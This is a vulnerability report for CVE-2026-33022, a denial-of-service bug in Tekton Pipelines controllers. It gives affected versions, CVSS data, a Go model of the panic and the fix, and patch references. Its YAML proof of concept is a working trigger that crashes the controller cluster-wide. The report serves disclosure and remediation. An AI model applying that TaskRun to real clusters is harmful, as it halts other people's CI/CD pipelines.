Security Vulnerability Report
CVE-2026-33022 CVSS 6.5 MEDIUM

CVE-2026-33022

Published: 2026-03-20 08:16:11
Last Modified: 2026-03-24 16:19:49

Description

Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Versions 0.60.0 through 1.0.0, 1.1.0 through 1.3.2, 1.4.0 through 1.6.0, 1.7.0 through 1.9.0, 1.10.0, and 1.10.1 have a denial-of-service vulnerability that allows any user who can create a TaskRun or PipelineRun to crash the controller cluster-wide by setting .spec.taskRef.resolver (or .spec.pipelineRef.resolver) to a string of 31+ characters. The crash occurs because GenerateDeterministicNameFromSpec produces a name exceeding the 63-character DNS-1123 label limit, and its truncation logic panics on a [-1] slice bound since the generated name contains no spaces. Once crashed, the controller enters a CrashLoopBackOff on restart (as it re-reconciles the offending resource), blocking all CI/CD reconciliation until the resource is manually deleted. Built-in resolvers (git, cluster, bundles, hub) are unaffected due to their short names, but any custom resolver name triggers the bug. The fix truncates the resolver-name prefix instead of the full string, preserving the hash suffix for determinism and uniqueness. This issue has been patched in versions 1.0.1, 1.3.3, 1.6.1, 1.9.2 and 1.10.2.
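A simplified Go model of the failure mode and of the fix described above. This is added illustration, not Tekton's code: hashSpec, vulnerableName and fixedName are hypothetical names, and a 32-hex-character hash suffix is assumed so that the arithmetic (63 - 32 - 1 = 30 characters of prefix) matches the 31-character trigger in the description.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"strings"
)

const maxLabelLen = 63 // DNS-1123 label limit for the generated name

// hashSpec stands in for the deterministic hash suffix; a 32-hex-character
// suffix is an assumption of this model, not Tekton's actual format.
func hashSpec(spec string) string {
	sum := sha256.Sum256([]byte(spec))
	return hex.EncodeToString(sum[:])[:32]
}

// vulnerableName models the pre-fix logic: the whole "<resolver>-<hash>" is
// cut at its last space, but the name has none, so LastIndex yields -1 and
// name[:-1] panics. recover() turns that into an error purely for observation.
func vulnerableName(resolver, spec string) (name string, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("controller would crash: %v", r)
		}
	}()
	name = resolver + "-" + hashSpec(spec)
	if len(name) > maxLabelLen {
		cut := strings.LastIndex(name[:maxLabelLen], " ") // -1: no spaces
		name = name[:cut]
	}
	return name, nil
}

// fixedName models the patched approach: only the resolver prefix is
// truncated, so the hash suffix survives and the result always fits the limit.
func fixedName(resolver, spec string) string {
	h := hashSpec(spec)
	if maxPrefix := maxLabelLen - len(h) - 1; len(resolver) > maxPrefix {
		resolver = resolver[:maxPrefix]
	}
	return resolver + "-" + h
}

func main() {
	long := "this-is-a-very-long-custom-resolver-name-over-31-chars"
	fmt.Println(vulnerableName(long, "example-task")) // untruncated name + panic error
	fmt.Println(fixedName(long, "example-task"))
}
```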

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:tekton_pipelines:*:*:*:*:*:go:*:* - VULNERABLE in the following version ranges:
Tekton Pipelines 0.60.0 - 1.0.0
Tekton Pipelines 1.1.0 - 1.3.2
Tekton Pipelines 1.4.0 - 1.6.0
Tekton Pipelines 1.7.0 - 1.9.0
Tekton Pipelines 1.10.0
Tekton Pipelines 1.10.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
apiVersion: tekton.dev/v1
kind: TaskRun
metadata:
  name: poc-cve-2026-33022
spec:
  # Use a resolver name longer than 31 characters
  # to trigger the panic in the controller.
  taskRef:
    resolver: "this-is-a-very-long-custom-resolver-name-over-31-chars"
    params:
      - name: name
        value: example-task

References

https://github.com/tektoncd/pipeline/commit/5eead3f859b9f938e86039e4d29185092c1d4ee6 (Patch)
https://github.com/tektoncd/pipeline/security/advisories/GHSA-cv4x-93xx-wgfj (GitHub security advisory GHSA-cv4x-93xx-wgfj)
Weakness (NVD): CWE-129
